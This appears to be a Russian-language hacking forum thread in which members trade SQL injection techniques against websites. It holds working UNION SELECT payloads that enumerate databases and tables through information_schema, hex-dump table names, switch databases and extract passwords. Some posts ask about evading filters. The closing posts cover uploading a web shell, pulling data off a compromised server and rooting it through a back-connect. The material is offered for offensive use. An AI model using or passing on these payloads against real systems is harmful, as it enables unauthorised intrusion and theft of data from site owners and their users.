Спасибо. Но тогда возникает вопрос по проге. В ней надо что бы заканчивался запрос на +limit+ Как это сделать со стандартной скулей? UNION SELECT 1,2,TABLE_NAME,4 ,5 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 --
тут просто даеш проге так: pxxp://site.com/script.php?id=1 UNION SELECT 1,2,<{param}>,4 ,5 FROM INFORMATION_SCHEMA.TABLES+limit+ а в поле "Что нужно сдампить" ставиш TABLE_NAME воббще если надо сначала тока табли слит быстро то вот так можно: pxxp://site.com/script.php?id=1 UNION SELECT 1,2,(select concat(0x7e,0x27,Hex(cast(group_concat(table_name) as char)),0x27,0x7e) FROM information_schema.tables),4 ,5 -- выдает все табли разом в хексе
POST запросы поддерживаются в версии 2.0 Для более сложных запросов подойдет Toolza от Pashkel'ы, которая кстати недавно обновилась https://rdot.org/forum/showthread.php?t=1142 Добавил версию 2.0 http://forum.antichat.ru/showpost.php?p=2544529&postcount=10
я не посмотрель что ты выложил, у меня уже был какой то версия. Ну тулзу я пробовал новую версию, но тоже не может хавать такие запросы тут даже попросил кодерам подсказать или наколбасит пару строк на перле именно для таких скулей(правда там дал я на одну колонку а тут две колонки) https://forum.antichat.ru/showthread.php?p=2536279 остался без ответа там
такой вопрос на счет фильтраций: ?var=-1+union+select+1,count(*),3,4,5+from information_schema.columns+where+table_schema!='information_schema'+--+ выводит количество, то есть не фильтруются даже кавычки, но вот выдернуть данные не получается вообще никакие. version() user() database() это все дает false. пробовал и так /*!verSion()*/ и 0x76657273696F6E2829 один хер - false. и это не только на эти три "слова", на все данные что пихаю в запрос.. не могу понять что за фильтры там стоят. если уже такое было не пинайте, тема большая всю ниасилить на трезвую голову.. буду рад ссылочке где описаны разные способы обхода такого рода фильтров.
Вытянул дб, а нужные колонки в таком виде 000000060664599b, чем расшифровать? или подскажите алгоритм, который используется ... Все разобрался, это уникальный идентификатор присвоенный скриптом ...
Вот. Нашел на свой вопрос удобный ответ. Товарищ помог group_concat(char(0x3C,0x62,0x72,0x3E),TABLE_NAME) Вдруг кому понадобиться.
А как можно переключать БД в Скуле например есть 4 БД, я сейчас нахожусь в 1-ой, а мне надо перейти в 3-ю. Как это сделать ?
1) Узнаем имеющиеся БД: PHP: union select 1,group_concat(schema_name) from information_schema.schemata+--+ 2) Узнаем таблицы из определенной БД PHP: select 1,group_concat(table_name) from information_schema.tables where table_schema='test' 3) Выводим данные из определенной БД: PHP: union select 1,password from test.users+--+
1) Если не известно название БД, то узнать его можно таким запросом Code: Select table_schema from information_schema.tables where table_name = {Нужный_тебе_столбец} 2) Если известно, то "переключиться" можно так Code: Select Нужная_тебе_информация from table_schema.Нужный_тебе_столбец Где table_schema - название необходимой БД
подскажите http://databases.about.com/od/security/a/sql_inject_test.htm в этой статье говорится бла-бла у меня тоже такая ошибка вылезла но только model=pr11'&(другие параметры) пробовал не помогает ошибка так и осталась каким способом можно еще проверить?
Эта ошибка совсем не является однозначным показателем присутствия скули. Также она может получаться, например, при конфликте кодировок (обычно бывает уже непосредственно при выводе) В твоем случае я бы поставил, что скули нет.
покажи что за ошибки выдаёт и при каких запросах просто в запросах могут быть например скобки, а ты комментируешь закрывающие. Поэтому я всегда смотрю id=1+and+1=1 или id=1'+and+'1'='1, т.к. работает внезависимости от скобок
Залил шелл, залажу в корень, в точку монтирования (/mnt), вижу отображение всего, что нужно а вот слить не могу, в чем проблема? или надо делать бекконнект, и рутать серв? P/S права на чтение папки есть ...
Прав на файлы м.б. не хватает? Т.е. на папку права есть, а на содержимое ее нет. Лучше рутай, если получится.
